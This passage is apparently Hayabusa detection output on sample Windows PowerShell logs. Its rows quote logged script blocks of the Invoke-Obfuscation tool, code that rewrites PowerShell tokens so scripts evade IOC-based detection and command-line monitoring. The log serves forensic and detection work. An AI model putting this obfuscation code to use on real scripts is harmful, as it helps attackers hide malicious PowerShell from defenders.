$ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. 
$TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. 
If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). 
If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND 